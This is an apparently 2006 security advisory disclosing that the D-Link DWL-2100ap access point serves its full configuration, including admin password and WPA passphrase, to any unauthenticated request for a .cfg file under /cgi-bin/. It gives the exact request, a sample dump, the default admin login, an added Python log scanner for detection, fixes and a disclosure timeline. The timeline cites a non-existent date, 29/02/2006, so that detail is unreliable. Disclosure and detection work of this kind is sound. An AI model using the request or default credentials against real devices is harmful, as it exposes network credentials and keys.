INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY
http://www.intruders.com.br/
http://www.intruders.org.br/
ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)
PRIORITY: HIGH
I - INTRUDERS:
----------------
Intruders Tiger Team Security is a project affiliated with
Security Open Source (http://www.securityopensource.org.br).
The Intruders Tiger Team Security (ITTS) is a group of researchers
with more than 10 years of experience, specialized in the development
of intrusion projects (Pen-Test) and in special security projects.
All intrusion projects (Pen-Test) carried out to date by
the Intruders Tiger Team Security had a 100% success rate.
II - INTRODUCTION:
------------------
D-Link AirPlus XtremeG 2.4GHz Wireless Access Point, 54Mbps/108Mbps (802.11g):
D-Link, the industry pioneer in wireless networking, introduces a performance
breakthrough in wireless connectivity - D-Link AirPlus Xtreme G(TM) series of
high-speed devices now capable of delivering transfer rates up to 15x faster
than the standard 802.11b with the new D-Link 108G. With the new AirPlus Xtreme
G DWL-2100AP Wireless Access Point, D-Link sets a new standard for wireless access
points.
D-Link DWL-2100ap is one of the most popular Access Points in the world.
III - DESCRIPTION:
------------------
During an intrusion project (Pen-Test), Intruders Tiger Team Security identified a
previously unknown vulnerability in the D-Link DWL-2100ap Access Point that allows an
attacker to read the device's configuration without authenticating to the web server.
Extremely sensitive information is available in the configuration of the D-Link
DWL-2100ap Access Point, for example:
- User and password used to manage the device.
- Password used in WEP and WPA.
- SSID, IP, subnet mask, MAC Address filters, etc.
IV - ANALYSIS:
---------------
An HTTP request to the /cgi-bin/ directory makes the Web server return error 404 (Page not found).
An HTTP request to /cgi-bin/AnyFile.htm also makes the Web server return error 404 (Page not found).
However, an HTTP request for any file name in the /cgi-bin/ directory with a .cfg extension
returns the entire device configuration.
For example, making the following request:
http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg
would return a result equivalent to the following:
# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.
The D-Link DWL-2100ap Access Point does not allow the Web server to be disabled, nor does it
have options to filter ports.
Remember that the D-Link DWL-2100ap Access Point comes configured with a default user /
password (user: admin and no password).
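To check whether this request pattern has reached a device, the following added example (not part of the original advisory) scans HTTP logs for requests to any .cfg name directly under /cgi-bin/. It assumes the logs come from a proxy or sensor in front of the Access Point and are in Common Log Format; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
# (assumption: logs are written by a proxy or sensor in front of the AP)
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

def is_cfg_probe(target):
    """True if the request path is a .cfg name directly under /cgi-bin/."""
    path = urlsplit(target).path          # drop any query string
    # Decode percent-escapes so /cgi-bin/x%2Ecfg is matched too; compare
    # case-insensitively as a conservative choice for detection.
    path = unquote(path).lower()
    return re.fullmatch(r'/cgi-bin/[^/]+\.cfg', path) is not None

def find_cfg_requests(lines):
    """Return (client, time, target, answered_200) for each matching request."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue                      # not a CLF line, skip it
        client, when, _method, target, status, _size = m.groups()
        if is_cfg_probe(target):
            # Status 200 means the server returned content for the .cfg name.
            hits.append((client, when, target, status == "200"))
    return hits

# Constructed sample log lines (not captured from a real device)
SAMPLE_LOG = [
    '10.0.0.57 - - [06/Jun/2006:10:01:02 -0300] "GET /cgi-bin/ HTTP/1.0" 404 0',
    '10.0.0.57 - - [06/Jun/2006:10:01:05 -0300] "GET /cgi-bin/AnyFile.htm HTTP/1.0" 404 0',
    '10.0.0.57 - - [06/Jun/2006:10:01:09 -0300] "GET /cgi-bin/Intruders.cfg HTTP/1.0" 200 4096',
    '10.0.0.99 - - [06/Jun/2006:11:15:40 -0300] "GET /cgi-bin/a%2Ecfg?x=1 HTTP/1.1" 200 4096',
    '10.0.0.12 - - [06/Jun/2006:11:20:00 -0300] "GET /index.htm HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, when, target, answered in find_cfg_requests(SAMPLE_LOG):
        verdict = "CONFIG RETURNED, rotate credentials" if answered else "not served"
        print(f"{when} {client} {target} -> {verdict}")
```

Any hit answered with status 200 should be treated as exposure of the management password and the WEP/WPA keys listed in section III.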
V. DETECTION:
-------------
Intruders Tiger Team Security confirmed the existence of this vulnerability in all firmware
versions tested, including the latest version, 2.10na.
Other D-Link Access Point model(s) may also be vulnerable.
VI. SUGGESTION:
--------------
D-Link company:
1 - Use strong cookies to guarantee that only authorized users can access the configuration.
2 - Store sensitive configuration values such as password(s) as hash(es).
3 - Allow the creation of firewall policies and rules to filter port(s) and IP(s).
4 - Require the user to change the default user/password on the first logon, and do not allow
the password to be changed back to the last one used.
5 - Use HTTP with SSL (HTTPS).
6 - Contract companies specialized in Pen-Test and security audit to validate the
security of D-Link products.
D-Link customers:
1 - Upgrade the firmware of the D-Link DWL-2100ap Access Point.
The direct download link is http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfp
VII - CHRONOLOGY:
-----------------
11/02/2006 - Vulnerability discovered during a Pen-Test.
15/02/2006 - D-Link World Wide Team Contacted.
17/02/2006 - No response.
18/02/2006 - D-Link World Wide Team re-contacted.
24/02/2006 - No response.
25/02/2006 - D-Link World Wide Team last try of contact.
29/02/2006 - No response.
29/02/2006 - D-Link Brazil Team Contacted.
02/03/2006 - No response.
03/03/2006 - D-Link Brazil Team re-contacted.
06/03/2006 - D-Link Brazil Team responded.
09/03/2006 - Patch created.
14/03/2006 - Patch added to D-Link Brazil download site.
06/06/2006 - Advisory published.
VIII - CREDITS:
---------------
Wendel Guglielmetti Henrique and Intruders Tiger Team Security discovered this vulnerability.
Thanks to Glaudson Ocampos (Intruders Tiger Team Security), Waldemar Nehgme, João
Arquimedes (Security Open Source) and Ricardo N. Ferreira (Security Open Source).